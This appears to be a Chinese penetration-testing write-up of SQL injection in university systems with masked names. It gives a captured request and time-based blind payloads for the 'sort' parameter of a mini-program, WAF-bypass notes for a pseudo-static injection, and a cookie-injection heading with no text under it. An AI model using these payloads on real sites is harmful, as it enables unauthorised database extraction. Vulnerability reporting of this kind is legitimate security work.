某大学校小程序存在sql注入(关键字注入)

burp拦截请求包，点击行页旁边的排序，随便选一个，抓包，参数sort存在排序注入

POST /xxx-mobile/xxxList/findMoreAlumniuser HTTP/1.1Host: x.x.x.xContent-Length: 33Xweb_xhr: 1Orgcode: hunauMtoken: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF XWEB/8447Content-Type: application/jsonAccept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

"page":1,"size":20,"sort":"asc"

payload：

"sort":"asc,1/if(length(database())=6,sleep(3),0)"

执行长度至6时出现报错

对比长度7 "sort":"asc,1/if(length(database())=7,sleep(3),0)" 页面正常回显

使用截取函数截取数据库首字母 使用payload：

 "sort":"asc,1/if(mid(database(),1,1)='a',sleep(3),0)"

对比第一个字母为b，正常回显

"sort":"asc,1/if(mid(database(),1,1)='b',sleep(3),0)"

某大学sql注入(伪静态注入)

发现有伪静态注入，一个 单引号报错，报错sql语句

尝试and是否过滤，发现and没有被过滤

尝试报错注入，发现普通的报错语句被waf拦截了

经过不断尝试，发现%23(#号),空格没有过滤，并且id是数字型，是括号闭合

.最后发现polygon函数没有被过滤，能够根据字段名爆出表名和列名

某大学工作流程系统存在sql注入(cookie关键字)